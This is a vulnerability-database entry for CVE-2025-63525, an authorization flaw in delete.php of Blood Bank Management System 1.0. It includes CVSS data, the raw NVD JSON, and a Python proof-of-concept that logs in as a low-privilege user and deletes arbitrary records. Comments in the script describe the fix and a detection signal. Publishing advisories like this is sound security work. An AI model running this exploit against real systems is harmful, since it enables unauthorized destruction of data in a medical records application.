Security Vulnerability Report
CVE-2025-63525 CVSS 9.6 CRITICAL

CVE-2025-63525

Published: 2025-12-01 15:15:51
Last Modified: 2026-01-06 21:15:43

Description

An issue was discovered in Blood Bank Management System 1.0 allowing authenticated attackers to perform actions with escalated privileges via crafted request to delete.php.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Blood Bank Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-63525 PoC - Blood Bank Management System 1.0 Privilege Escalation
# Target: delete.php file with insufficient authorization check
#
# What the script demonstrates: a session authenticated as a low-privilege
# account posts to delete.php, and the application (CWE-284, improper access
# control, per the advisory) is expected to act on that request without
# checking the caller's role or ownership of the record.
# The application-side fix is a server-side role/ownership check in delete.php
# before any row is removed; a delete.php request issued by a session whose
# role is not permitted to delete is the matching detection signal in web
# server and application logs.


def exploit_cve_2025_63525(target_url: str, username: str, password: str, target_resource_id: str) -> bool:
    """
    Exploit for CVE-2025-63525: Privilege escalation via delete.php

    Two HTTP POSTs on one requests.Session: a login to /login.php, then a
    delete to /delete.php carrying the target id. Success is judged only from
    the HTTP status and a substring match on the response body, so the result
    is a heuristic rather than a verified deletion.

    Args:
        target_url: Base URL of the vulnerable Blood Bank Management System
        username: Valid low-privilege account username
        password: Password for the account
        target_resource_id: ID of the resource to delete (can be any resource)

    Returns:
        bool: True if exploitation successful, False otherwise
    """
    # One session so the cookie set by login.php is reused for delete.php.
    session = requests.Session()

    # Step 1: Login with low-privilege account
    login_url = f"{target_url}/login.php"
    login_data = {
        'username': username,
        'password': password
    }

    try:
        response = session.post(login_url, data=login_data, timeout=10)
        # NOTE: only the HTTP status is checked. A login page that returns
        # 200 with an "invalid credentials" message also passes this test,
        # so the "logged in" message below is not proof of a valid session.
        if response.status_code != 200:
            print(f"[-] Login failed: HTTP {response.status_code}")
            return False

        print(f"[+] Successfully logged in as low-privilege user: {username}")

        # Step 2: Exploit the privilege escalation via delete.php
        delete_url = f"{target_url}/delete.php"

        # Craft malicious request to delete arbitrary resources
        delete_data = {
            'id': target_resource_id,
            # Additional parameters that may bypass authorization
            # NOTE(review): 'action' and 'confirm' are the PoC author's
            # assumption; the advisory names only delete.php and the id, so
            # whether the server reads these fields is not established here.
            'action': 'delete',
            'confirm': '1'
        }

        # The XHR header is presumably set to mimic the application's own
        # front-end request; nothing on this page shows the server requires it.
        headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
            'X-Requested-With': 'XMLHttpRequest'
        }

        response = session.post(delete_url, data=delete_data, headers=headers, timeout=10)

        # Check if deletion was successful
        # Heuristic only: a 200 page whose error text happens to contain
        # "deleted" (e.g. "record not deleted") is reported as success, so a
        # True result should be confirmed out of band before it is reported.
        if response.status_code == 200:
            if 'success' in response.text.lower() or 'deleted' in response.text.lower():
                print(f"[+] Privilege escalation successful!")
                print(f"[+] Resource ID {target_resource_id} deleted without proper authorization")
                return True

        # Reached for any non-200 status or a 200 body without the markers.
        print(f"[-] Exploitation may have failed. Check response manually.")
        print(f"[-] Response status: {response.status_code}")
        return False

    except requests.exceptions.RequestException as e:
        # session.post does not raise on HTTP error statuses (no
        # raise_for_status call), so only transport-level failures land here.
        print(f"[-] Request failed: {e}")
        return False


if __name__ == "__main__":
    # CLI entry point: four positional arguments, validated by count only.
    if len(sys.argv) < 5:
        print("Usage: python cve_2025_63525_poc.py <target_url> <username> <password> <resource_id>")
        print("Example: python cve_2025_63525_poc.py http://localhost/bloodbank admin password 1")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    # The password is read from argv, so it is visible in process listings
    # and shell history on the machine running the script.
    pwd = sys.argv[3]
    resource_id = sys.argv[4]

    print(f"[*] CVE-2025-63525 PoC - Blood Bank Management System 1.0")
    print(f"[*] Target: {target}")

    # Return value is discarded; the outcome is only reported via the prints
    # inside the function, and the process exit code is 0 either way.
    exploit_cve_2025_63525(target, user, pwd, resource_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63525", "sourceIdentifier": "[email protected]", "published": "2025-12-01T15:15:51.103", "lastModified": "2026-01-06T21:15:43.240", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Blood Bank Management System 1.0 allowing authenticated attackers to perform actions with escalated privileges via crafted request to delete.php."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5B391DFD-8072-4642-9A31-9E4DE8648367"}]}]}], "references": [{"url": "https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing", "source": 
"[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Shridharshukl/Blood-Bank-Management-System", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63525.md", "source": "[email protected]", "tags": ["Exploit"]}]}}